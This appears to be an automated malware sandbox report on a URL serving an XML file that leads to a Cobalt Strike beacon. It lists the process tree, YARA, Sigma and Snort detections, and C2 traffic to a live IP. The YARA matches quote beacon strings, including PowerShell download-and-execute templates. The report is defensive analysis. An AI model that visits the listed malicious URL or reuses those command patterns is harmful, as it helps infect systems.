Edit tour

Windows Analysis Report
http://213.109.202.222/download/xml.xml

Overview

General Information

Sample URL:	http://213.109.202.222/download/xml.xml
Analysis ID:	1400842
Infos:

Detection

CobaltStrike

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Early bird code injection technique detected

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected CobaltStrike

Allocates memory in foreign processes

Downloads suspicious files via Chrome

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Sigma detected: Notepad Making Network Connection

Writes to foreign memory regions

Creates a process in suspended mode (likely to inject code)

Drops PE files

May sleep (evasive loops) to hinder dynamic analysis

Potential browser exploit detected (process start blacklist hit)

Sigma detected: Use Short Name Path in Command Line

Stores files to the Windows start menu directory

Tries to load missing DLLs

Yara signature match

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 2824 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://213.109.202.222/download/xml.xml MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 1652 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=1948,i,2797339336198320532,18040272526632211927,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

MSOXMLED.EXE (PID: 6676 cmdline: C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\user\Downloads\xml.xml MD5: A2E6E2A1C125973A4967540FD08C9AF0)

iexplore.exe (PID: 6724 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\user\Downloads\xml.xml MD5: CFE2E6942AC1B72981B3105E22D3224E)

iexplore.exe (PID: 6860 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6724 CREDAT:17410 /prefetch:2 MD5: 6F0F06D6AB125A99E43335427066A4A1)

ie_to_edge_stub.exe (PID: 6952 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=202d4 MD5: 89CF8972D683795DAB6901BC9456675D)

msedge.exe (PID: 7012 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=202d4 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 6304 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=1956,i,12291376917359172718,11941003201960649929,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

ssvagent.exe (PID: 6976 cmdline: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new MD5: F9A898A606E7F5A1CD7CFFA8079253A0)

MSOXMLED.EXE (PID: 6700 cmdline: C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\user\Downloads\xml.xml MD5: A2E6E2A1C125973A4967540FD08C9AF0)

iexplore.exe (PID: 6784 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\user\Downloads\xml.xml MD5: CFE2E6942AC1B72981B3105E22D3224E)

msedge.exe (PID: 3988 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=202d4 --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 6740 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7592 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6304 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7632 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6596 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 6884 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6928 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

cookie_exporter.exe (PID: 4076 cmdline: cookie_exporter.exe --cookie-json=1148 MD5: 3DD7152D6D33725EA5958D7DE2586B97)

msedge.exe (PID: 9016 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7884 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7352 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-GB --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8184 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

xml.exe (PID: 7644 cmdline: "C:\Users\user\Downloads\xml.exe" MD5: 91807225181F95317A20DF820AF456BF)

conhost.exe (PID: 9092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

notepad.exe (PID: 1132 cmdline: C:\Windows\System32\notepad.exe MD5: 27F71B12CB585541885A31BE22F61C83)

msedge.exe (PID: 5160 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6776 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

rundll32.exe (PID: 8080 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)

MSOXMLED.EXE (PID: 8164 cmdline: C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\user\Downloads\xml.xml MD5: A2E6E2A1C125973A4967540FD08C9AF0)

iexplore.exe (PID: 8004 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\user\Downloads\xml.xml MD5: CFE2E6942AC1B72981B3105E22D3224E)

iexplore.exe (PID: 8804 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:8004 CREDAT:9474 /prefetch:2 MD5: 6F0F06D6AB125A99E43335427066A4A1)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Cobalt Strike, CobaltStrike	Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.	APT 29 APT32 APT41 AQUATIC PANDA Anunak Cobalt Codoso CopyKittens DarkHydrus FIN6 FIN7 Leviathan Mustang Panda Shell Crew Stone Panda TianWu UNC1878 UNC2452 Winnti Umbrella	http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems http://blog.nsfocus.net/murenshark http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa http://www.secureworks.com/research/threat-profiles/gold-drake	https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x32d6a:$a11: Could not open service control manager on %s: %d 0x3329c:$a12: %d is an x64 process (can't inject x86 content) 0x332cc:$a13: %d is an x86 process (can't inject x64 content) 0x335ed:$a14: Failed to impersonate logged on user %d (%u) 0x33255:$a15: could not create remote thread in %d: %d 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x33203:$a17: could not write to process memory: %d 0x32d9b:$a18: Could not create service %s on %s: %d 0x32e24:$a19: Could not delete service %s on %s: %d 0x32c89:$a20: Could not open process token: %d (%u)
00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x334b2:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x334fc:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x332cc:$x3: %d is an x86 process (can't inject x64 content) 0x32c89:$s1: Could not open process token: %d (%u) 0x329a3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32d47:$s4: Could not connect to pipe (%s): %d
00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x41bf1:$loader_export: ReflectiveLoader 0x32960:$exportname: beacon.dll
00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x3329c:$x2: %d is an x64 process (can't inject x86 content) 0x335ed:$x3: Failed to impersonate logged on user %d (%u) 0x334fc:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x334b2:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x32c0f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x33203:$s4: could not write to process memory: %d 0x329a3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32d47:$s6: Could not connect to pipe (%s): %d
00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x33970:$str1: %s (admin) 0x32960:$str2: beacon.dll
00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x334fc:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x332cc:$x2: %d is an x86 process (can't inject x64 content) 0x334b2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x33596:$x4: Failed to impersonate token from %d (%u) 0x335ed:$x5: Failed to impersonate logged on user %d (%u) 0x329a3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x3348a:$s1: %%IMPORT%% 0x32987:$s2: www6.%x%x.%s 0x3297b:$s3: cdn.%x%x.%s 0x32c03:$s4: api.%x%x.%s 0x33970:$s5: %s (admin) 0x32c72:$s6: could not spawn %s: %d 0x3352e:$s7: Could not kill %d: %d 0x32d47:$s8: Could not connect to pipe (%s): %d 0x32994:$s9: %s.1%x.%x%x.%s 0x329a3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a1b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a7e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32ac4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b02:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x32b38:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b61:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b86:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x32ba7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x32bc4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x32bdd:$s9: %s.1%08x%08x.%x%x.%s 0x32bf2:$s9: %s.1%08x.%x%x.%s
00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_4	Yara detected CobaltStrike	Joe Security
00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x30fa3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3101b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31780:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x31ab2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31a44:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x31ab2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x3107e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3120f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x310c4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31102:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31afc:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x3136a:$a11: Could not open service control manager on %s: %d 0x3189c:$a12: %d is an x64 process (can't inject x86 content) 0x318cc:$a13: %d is an x86 process (can't inject x64 content) 0x31bed:$a14: Failed to impersonate logged on user %d (%u) 0x31855:$a15: could not create remote thread in %d: %d 0x31138:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31803:$a17: could not write to process memory: %d 0x3139b:$a18: Could not create service %s on %s: %d 0x31424:$a19: Could not delete service %s on %s: %d 0x31289:$a20: Could not open process token: %d (%u)
00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1cd3c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1896a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x19c9b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x31ab2:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31afc:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x318cc:$x3: %d is an x86 process (can't inject x64 content) 0x31289:$s1: Could not open process token: %d (%u) 0x30fa3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31347:$s4: Could not connect to pipe (%s): %d
00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x401f1:$loader_export: ReflectiveLoader 0x30f60:$exportname: beacon.dll
00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x3189c:$x2: %d is an x64 process (can't inject x86 content) 0x31bed:$x3: Failed to impersonate logged on user %d (%u) 0x31afc:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x31ab2:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x3120f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x31803:$s4: could not write to process memory: %d 0x30fa3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31347:$s6: Could not connect to pipe (%s): %d
00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x31f70:$str1: %s (admin) 0x30f60:$str2: beacon.dll
00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x31afc:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x318cc:$x2: %d is an x86 process (can't inject x64 content) 0x31ab2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31b96:$x4: Failed to impersonate token from %d (%u) 0x31bed:$x5: Failed to impersonate logged on user %d (%u) 0x30fa3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen
00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x31a8a:$s1: %%IMPORT%% 0x30f87:$s2: www6.%x%x.%s 0x30f7b:$s3: cdn.%x%x.%s 0x31203:$s4: api.%x%x.%s 0x31f70:$s5: %s (admin) 0x31272:$s6: could not spawn %s: %d 0x31b2e:$s7: Could not kill %d: %d 0x31347:$s8: Could not connect to pipe (%s): %d 0x30f94:$s9: %s.1%x.%x%x.%s 0x30fa3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3101b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3107e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x310c4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31102:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31138:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31161:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31186:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x311a7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x311c4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x311dd:$s9: %s.1%08x%08x.%x%x.%s 0x311f2:$s9: %s.1%08x.%x%x.%s
Click to see the 20 entries

Sigma Signatures

System Summary

Sigma detected: Notepad Making Network Connection

Source: Network Connection

Author: EagleEye Team: Data: DestinationIp: 213.109.202.222, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\notepad.exe, Initiated: true, ProcessId: 1132, Protocol: tcp, SourceIp: 192.168.2.17, SourceIsIpv6: false, SourcePort: 49837

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, CommandLine: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, CommandLine|base64offset|contains: w, Image: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, NewProcessName: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, OriginalFileName: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, ParentCommandLine: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6724 CREDAT:17410 /prefetch:2, ParentImage: C:\Program Files (x86)\Internet Explorer\iexplore.exe, ParentProcessId: 6860, ParentProcessName: iexplore.exe, ProcessCommandLine: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, ProcessId: 6976, ProcessName: ssvagent.exe

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 1, EventID: 13, EventType: SetValue, Image: C:\Program Files\Internet Explorer\iexplore.exe, ProcessId: 6724, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SecuritySafe

Snort Signatures

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:33.307084
SID:	2033713
Source Port:	49879
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:30.732534
SID:	2033713
Source Port:	49873
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:44.177958
SID:	2033713
Source Port:	49907
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:34.339188
SID:	2033713
Source Port:	49882
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:36.428537
SID:	2033713
Source Port:	49888
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:42.643899
SID:	2033713
Source Port:	49901
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:09.133704
SID:	2033713
Source Port:	49959
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:13.823969
SID:	2033713
Source Port:	49968
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:17.491024
SID:	2033713
Source Port:	49977
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:45.774544
SID:	2033713
Source Port:	49910
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

